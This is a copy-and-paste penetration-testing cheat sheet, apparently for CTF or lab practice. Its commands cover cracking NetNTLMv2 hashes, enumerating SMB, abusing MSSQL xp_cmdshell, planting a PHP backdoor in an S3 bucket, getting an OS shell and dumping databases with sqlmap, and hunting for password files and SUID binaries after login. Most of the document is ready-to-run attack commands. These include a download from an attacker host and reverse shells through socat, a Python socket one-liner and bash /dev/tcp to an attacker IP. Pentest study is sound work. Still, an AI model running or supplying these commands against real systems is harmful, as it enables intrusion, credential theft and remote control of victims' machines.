Multiple sections with quick hints and cheats to copy/paste.

-> Written with Parrot OS in mind, so locations may differ if you are using a different attack distro.

Passwords #

Password Cracking #

John NTMLv2 (Responder) cracking

john -w=/usr/share/wordlists/rockyou.txt <responder_output>.txt --format=netntlmv2

Windows stuff #

Enumeration #

SMB Share enumeration

smbclient -L <IP_address>

SMB Share content listing

smbclient \\\\<IP_address>\\<share>

Database stuff #

MSSQL #

More info: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

Connect using known creds with impacket

python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py {WINDOMAIN}/{username}:{known_pass}@{IP_address} -windows-auth

if this doesn't work and you're sure the creds are correct try without -windows-auth.

Things to try when using mssqlclient.py:

• Is the user admin? SELECT is_srvrolemember('sysadmin');
• Enable xp_cmdshell: enable_xp_cmdshell
• List system files: xp_cmdshell dir
• Who am I: xp_cmdshell "powershell -c whoami"
• Current working dir: xp_cmdshell "powershell -c pwd"
• Upload a shell: xp_cmdshell "powershell -c cd c:\Users\<user>;wget http://<attacker_ip:port>/socat.exe -outfile socat.exe" NOTE: assumes you know how to host a file on your attack machine with a web server.
• Execute a shell: xp_cmdshell "powershell -c cd c:\users\<user>;.\socat tcp-connect:<attacker_ip>:8999 exec:''cmd.exe'',pty,stderr,setsid,sigint,sane" NOTE: check the "Shells & Reverse Shells" section for more info - Also note that there's double single quotes around cmd.exe, it's needed!

Mongo DB #

With local access to the a machine that's running Mongo connect to it and see if it's possible to enumerate admins:

 mongo --port 27117 {db_name} --eval "db.admin.find().forEach(printjson);"

the output should contain x_shadow with a hashed version of the user's password.

Web stuff #

Enumeration #

Gobuster enumerate directories

gobuster dir http://location -w /usr/share/wordlists/directory-list-2.3-medium.txt -t 100

Gobuster enumerate vhosts

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://location

S3 Bucket manipulation #

More info: https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#public-cloud-assets

S3Scanner enumerate buckets for custom endpoint ("-u")

s3scanner -u http://s3.custom_location.blah -i scan -f /usr/share/wordlists/BucketNames.txt

For more custom endpoint examples (DO, etc.) check: https://github.com/sa7mon/S3Scanner

AWSCli list insecure custom endpoint bucket contents

aws --endpoint=http://s3.custom_location.bleh s3 ls bucket_name

AWSCli copy PHP shell to bucket

aws --endpoint=http://s3.custom_location_bleh s3 cp /usr/share/webshells/php/qsd-php-backdoor.php s3://bucket_name/images/

SQL Injection #

SQLMap is great but can be noisy, but it's a good start: find an entry point, and get a shell

sqlmap -u 'http://<victim_address>/<vulnerable_page>.php?<query>=any+query' --
cookie="{cookie_authentication_details} --os-shell"

Web Sockets Read: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

The most simple way to use WebSockets with sqlmap is to simply use the script discussed in the above url. Make sure to change ws_server to the actual endoint identified and data to the vulnerable query. For example if the vulnerable id is "id" change to data = '{"id":"%s"}' % message.

Call sqlmap using to identify databases:

sqlmap -u "http://localhost:8081/?id=1" --batch --dbs

Dump the DB contents:

sqlmap -u "http://localhost:8081/?id=1" -D db_name --tables --columns --dump-all

System Checks #

Things to do when you first login to a system

Linux #

1. Check user id: id
2. For every group they're a member: find / -group {groupname} 2>/dev/null
3. Check SUDO rights: sudo -l
4. Check if any of those files are interesting, if they're SUID, etc.
5. Find any files that contain the word "passw" find / -type f -exec grep -il passw {} \; 2>/dev/null or grep -irl pass / 2>/dev/null
6. Find any files that partially match "passw" find / -type f -name "*passw*" -ls 2>/dev/null
7. Find SUID files that the user can write to and that are Bash, Zsh, Python or Perl scripts find / -type f -name "*.sh" -o -name "*.zsh" -o -name "*.py" -o -name "*.pl" -perm /u+x -a -perm /u+w -ls 2>/dev/null
8. Find SUID files find / -type f -perm /u+rwx -ls 2>/dev/null
9. Run linpeas.sh
10. Check for vhosts: cat /etc/hosts
11. Check for alt interfaces: ip addr or ifconfig

Windows #

1. check user groups: whoami /all
2. Run winpeas.bat

Shells & Reverse Shells #

Easy cheatsheet to generate shells: https://www.revshells.com/

Socat Remote Shells #

On the victim (WINDOWS):

socat tcp-connect:<attacker_ip>:8999 exec:'cmd.exe',pty,stderr,setsid,sigint,sane #'cmd.exe' has normal quotes

On the victim (Linux):

socat tcp-connect:<attacker_ip>:8999 exec:'bash -i',pty,stderr,setsid,sigint,sane #'bash' has normal quotes

Alternative using python only:

python -c 'import socket,pty,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<HOST>",8999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(["/bin/bash","-i"]);'

On the attacker (LINUX):

socat file:`tty`,raw,echo=0 tcp-listen:8999,reuseaddr #`tty` is using backticks

Raw Python & netcat #

The advantage of SOCAT is that it can create a decent shell that funcitons as expected. Assuming you get a reverse shell with netcat but not SOCAT for any reason you can execute the following inside your netcat shell to get a fully functional shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

or create a reverse shell without 3rd party software required:

bash -c "bash -i >& /dev/tcp/{attacker_IP}/443 0>&1"

or to get a functional shell try using the script command if it's available:

script /dev/null -c bash